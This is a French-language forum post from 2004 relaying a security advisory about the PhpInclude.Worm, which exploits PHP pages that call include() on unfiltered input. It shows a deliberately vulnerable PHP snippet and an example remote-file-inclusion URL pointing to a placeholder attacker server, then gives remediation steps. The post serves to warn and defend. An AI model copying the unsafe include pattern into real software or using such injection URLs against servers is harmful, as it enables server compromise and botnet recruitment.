Blaster
Administrateur
Inscrit le: 08 Aoû 2003
Messages: 2891
Localisation: Vesoul ( proche besançon )
|
 Posté le: 28 Déc 2004 15:36 Sujet du message: Le ver PhpInclude.Worm attaque les pages php insécurisées |
 |
|
Le nouveau ver PhpInclude.Worm se propage activement sur internet, il s'attaque à toute page dynamique non sécurisée. [Ce ver est détecté par certains antivirus comme étant la variante C ou E de Santy. Nous estimons que ce ver est totalement différent de la famille Santy (la seule similitude réside dans l'utilisation des moteurs de recherche), nous avons donc décidé de lui attribuer l'alias générique "PhpInclude.Worm"].
Contrairement à Santy, PhpInclude.Worm n'exploite pas les vulnérabilités phpBB, il exploite une palette plus large de failles dites "de programmation". Il recherche (via Google/Yahoo/AOL) des serveurs web dont les pages php utilisent les fonctions "include()" et "require()" de façon non-sécurisée. Comment ?
Ces fonctions sont normalement utilisées par les programmeurs afin d'inclure des pages web spécifiées en arguments. Malheureusement, la non vérification de ces arguments peut permettre l'inclusion et l'exécution de fichiers externes, et donc la compromission du serveur web :
-------- Exemple : vulnerable.php --------
if(isset($page))
{
include($page);
}
-----------------------------------------------
La page ci-dessus ne filtre pas correctement la variable $page, elle permet donc l'inclusion puis l'exécution de scripts arbitraires distants :
vulnerable.php?page=http://server_pirate/scriptmalicieux?cmd=commandes_malicieuses
PhpInclude.Worm recherche donc des pages du type "*.php?*=", puis tente d'y injecter différentes commandes permettant l'installation de robots IRC et la constitution d'une armée de machines zombies contrôlées par un groupe de pirates brésiliens.
Ces failles étant liées aux applications web et non pas à la plateforme ou à la version de PHP, PhpInclude.Worm et ses prochaines variantes continueront à se propager sur internet pendant de longs mois, d'où un risque qualifié d'Elevé par K-OTik Security.
Update : Les éditeurs antivirus ont suivi nos recommandations et ont retiré ce ver de la famille Santy [les nouveaux alias sont désormais : Perl.PhpInlude.Worm, Perl.Spyki, Perl.Lexac].
Solution pré-infection
Vérifier vos scripts php afin d'y détecter d'éventuelles vulnérabilités.
Solution post-infection
-> Si vous n'avez pas un accès "root", vous devez contacter votre hébergeur ou administrateur.
-> Si vous avez un accès "root" :
- Arrêter le serveur web afin d'éviter de nouvelles infections.
- Identifier les fichiers et les scripts malicieux (en cours d'exécution) puis tuer les processus perl ou sh anormaux.
- Faire une recherche exhaustive des fichiers modifiés ou installés.
- Effacer ces fichiers malicieux afin d'éviter les rebonds.
- Identifier et corriger les vulnérabilités ayant permis la compromission du serveur (voir logs web)
En cas d'incident, vous pouvez contacter notre Cellule de Surveillance et de Réaction aux Menaces Informatiques (C.S.R.M.I) : incidents@k-otik.com
Plus d'infos & sources :
http://www.k-otik.com/news/20041226.PhpIncludeWorm.php
_________________
Cordialement , Julien .
Administrateur et webmaster phpBB-Graph.com
Votre problème est résolu ? Ajouter [Réglé] dans le titre de votre message . |
|
FAQ
Rechercher
Liste des Membres
Groupes d'utilisateurs
S'enregistrer
Profil
Se connecter pour vérifier ses messages privés
Connexion
